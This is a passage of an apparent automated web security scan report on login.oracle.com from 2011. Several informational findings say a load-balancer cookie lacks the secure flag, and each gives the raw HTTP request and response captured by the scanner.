eEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
HTTP/1.1 404 Not Found Date: Tue, 06 Sep 2011 16:14:14 GMT Content-Length: 1214 Content-Type: text/html; charset=UTF-8 X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Draft//EN"> <HTML> <HEAD> <TITLE>Error 404--Not Found</TITLE> <META NAME="GENERATOR" CONTENT="WebLogic Server"> </HEAD> <BODY bgcolor="white"> <FONT FACE=He...[SNIP]...
7.12. https://login.oracle.com/mysso/signon.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/signon.jsp
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
POST /mysso/signon.jsp HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~40F0BA36~0FE16C859C981BB9E73EC1BCB9520947AE23F3021BDE9E6E23623271A3C2A398FE62ABE37945281257E1D3B824BF88141320CDBA0FF76662E24760C533E30D1DCDABEEFDEB72A48E4C6C9ABEDBAF51A9F1010418767AFB7CACAE1E8A1D5BC67D978240D0CFE377F5A9ADE3F9C63F1468D714D8960345942853A8A315C8DEC76320F764A19C14D049E8440950AC3FCB19E8C4625DF9A3218AC7A9ED349F2636076CCFF871747F137DD74D5C63E78617CA86A85534A4BE22A035A1A5C4CE436DAA199E4D86DF00E9AC3337241384508207C772ECABF9255F75DBC84BE0AD6B9337EBE668883113A8DBFD3E00FEA9314357 Content-Length: 2822 Cache-Control: max-age=0 Origin: https://login.oracle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000 site2pstoretoken=v1.4%7E40F0BA36%7E0FE16C859C981BB9E73EC1BCB9520947AE23F3021BDE9E6E23623271A3C2A398FE62ABE37945281257E1D3B824BF88141320CDBA0FF76662E24760C533E30D1DCDABEEFDEB72A48E4C6C9ABEDBAF51A9F1010...[SNIP]...
Response
HTTP/1.1 200 OK Cache-Control: no-cache Date: Tue, 06 Sep 2011 16:14:14 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Expires: 0 Set-Cookie: ORA_UCM_VER=; domain=.oracle.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/ Set-Cookie: ORA_UCM_SRVC=; domain=.oracle.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/ X-ORACLE-DMS-ECID: 0000J8zXBRM6uHK6EVADUS1EHWFB01t_bQ X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/ Content-Length: 14934 <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"> <html...[SNIP]...
7.13. https://login.oracle.com/mysso/sso_loginui/b-bg.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/b-bg.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mysso/sso_loginui/b-bg.gif HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/mysso/signon.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:17 GMT Accept-Ranges: bytes Content-Length: 51 Content-Type: image/gif Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT X-ORACLE-DMS-ECID: 0000J8zXCB_6uHK6EVADUS1EHWFB01t_ck X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/ GIF89a...................!.......,..............P.;
7.14. https://login.oracle.com/mysso/sso_loginui/b-l-corner.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/b-l-corner.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mysso/sso_loginui/b-l-corner.gif HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/mysso/signon.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:17 GMT Accept-Ranges: bytes Content-Length: 188 Content-Type: image/gif Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT X-ORACLE-DMS-ECID: 0000J8zXCBj6uHK6EVADUS1EHWFB01t_cl X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/ GIF89a.......................................................................................................!.......,..........9.4.dY.f:........@..=./\H....k.......$t..D.(....t;M...x...;
7.15. https://login.oracle.com/mysso/sso_loginui/b-r-corner.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/b-r-corner.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:19 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mysso/sso_loginui/b-r-corner.gif HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/mysso/signon.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:19 GMT Accept-Ranges: bytes Content-Length: 190 Content-Type: image/gif Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT X-ORACLE-DMS-ECID: 0000J8zXCXF6uHK6EVADUS1EHWFB01t_dQ X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:19 GMT; path=/ GIF89a.......................................................................................................!.......,..........; %.$9..x..../y.1A...NB,6...2Y.b.I...L..V.0. "...*.8H..8. .B.;
7.16. https://login.oracle.com/mysso/sso_loginui/gray-b-l-b.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/gray-b-l-b.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mysso/sso_loginui/gray-b-l-b.gif HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/mysso/signon.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; 